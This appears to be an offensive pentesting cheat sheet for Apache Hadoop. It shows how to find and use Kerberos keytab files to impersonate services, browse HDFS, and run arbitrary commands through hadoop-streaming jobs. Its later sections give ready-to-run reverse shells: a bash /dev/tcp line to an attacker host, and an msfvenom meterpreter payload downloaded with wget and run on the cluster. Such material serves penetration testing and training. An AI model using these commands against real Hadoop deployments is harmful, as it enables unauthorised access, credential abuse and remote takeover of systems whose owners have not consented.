# Apache Hadoop Pentesting

## Apache Hadoop Pentesting <a href="#apache-hadoop-pentesting" id="apache-hadoop-pentesting"></a>

Apache Hadoop is a collection of open-source software utilities that facilitates using a network of many computers to solve problems involving massive amounts of data and computation. It uses ports 8020, 9000, 50010, 50020, 50070, 50075, 50475 by default.

### Authenticate using Keytab <a href="#authenticate-using-keytab" id="authenticate-using-keytab"></a>

Kyetab files are used to authenticate to the KDC (key distribution center) on Kerberos authentication. To find them, execute the following command in target system.

```shellscript
find / -type f -name *.keytab 2>/dev/null
```

After finding them, we can use them to gather information or authenticate.

```shellscript
# Gather information from a keytab
# -k: Speicifed a keytab file
klist -k /path/to/example.keytab

# Authenticate to Kerberos server and request a ticket.
# <principal_name>: it' stored in example.keytab. Run `klist -k example.keytab` to check it.
# -k: Use a keytab
# -V: verbose mode
# -t <keytab_file>: Filename of keytab to use
kinit <principal_name> -k -V -t /path/to/example.keytab
# e.g.
kinit user/hadoop.docker.com@EXAMPLE.COM -k -V -t /path/to/example.keytab
```

#### Impersonate Another Hadoop Service <a href="#impersonate-another-hadoop-service" id="impersonate-another-hadoop-service"></a>

We can authenticate other services by executing **`klist`** and **`kinit`**. Then we can investigate the HDFS service by the following HDFS commands.

### HDFS Commands <a href="#hdfs-commands" id="hdfs-commands"></a>

#### Find HDFS Binary Path <a href="#find-hdfs-binary-path" id="find-hdfs-binary-path"></a>

When authenticated, we need to find the path of the **`hdfs`** command associated with Hadoop. This command allows us to execute file system command in the datalake.\
If the path exists in the default PATH (confirm to run **`echo $PATH`**), we don't have to find them. However, if the path is not set in the default PATH, find it by running the following command.

```
find / -type f -name hdfs 2>/dev/null
```

If we find the path, go to the directory and use commands as below.

#### HDFS Command Cheat Sheet <a href="#hdfs-command-cheat-sheet" id="hdfs-command-cheat-sheet"></a>

Please refer to <https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HDFSCommands.html#Overview>

As mentioned above, if the **`hdfs`** path is not set in the PATH, we need to go to where the **`hdfs`** binary exists.\
Basically, their commands are similar to UNIX.

```shellscript
hdfs dfs -help

# List files in the hdfs service root.
hdfs dfs -ls /
# -R: Recursive
hdfs dfs -ls /R /
# Get the contents of the file
hdfs dfs -cat /example.txt
```

### RCE (Remote Code Execution) <a href="#rce-remote-code-execution" id="rce-remote-code-execution"></a>

Reference: [https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools Techniques and Procedures/Executing remote commands](https://github.com/wavestone-cdt/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands)

First we need to create arbitrary file that contains at lease one character. Then put it on HDFS.

```shellscript
echo hello > /tmp/hello.txt
hdfs dfs -put /tmp/hello.txt /tmp/hello.txt
```

Now execute below command to execute remote command.\
Note that the **`-output`** directory needs to be NOT exist, so if we want to multiple execute command, we have to delete the previous output folder or specify another name.

```
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "cat /etc/passwd" -reducer NONE
```

We can see the result of the command in the output directory. For example,

```shellscript
hdfs dfs -ls /tmp/output
hdfs dfs -cat /tmp/output/part-00000
```

#### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

In target machine, create a reverse shell script and put it on HDFS.

```shellscript
echo '/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' > /tmp/shell.sh
hdfs dfs -put /tmp/shell.sh /tmp/shell.sh
```

In local machine, start a listener.

```shellscript
nc -lvnp 4444
```

Now execute the following command.

```shellscript
# -mapper: The HDFS path of the shell.elf
# -file: The system path of the shell.elf
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.sh" -reducer NONE -file "/tmp/shell.sh"  -background
```

We can get a shell in local machine.

#### Reverse Shell (MsfVenom) <a href="#reverse-shell-msfvenom" id="reverse-shell-msfvenom"></a>

First create a reverse shell payload using msfvenom in local machine and prepare a listener using msfconsole.

```shellscript
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf

msfconsole
msf> use exploit/multi/handler
msf> set payload linux/x86/meterpreter/reverse_tcp
msf> set lhost 10.0.0.1
msf> set lport 4444
msf> run
```

Transfer the payload to target machine.

```shellscript
wget http://10.0.0.1:8000/shell.elf -O /tmp/shell.elf
# Put it on HDFS.
hdfs dfs -put /tmp/shell.elf /tmp/shell.elf
```

Now execute the following command.

```shellscript
# -mapper: The HDFS path of the shell.elf
# -file: The system path of the shell.elf
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.elf" -reducer NONE -file "/tmp/shell.elf"  -background
```

We can get a shell in meterpreter so to spawn the OS shell, run **`shell`** command in the meterpreter.
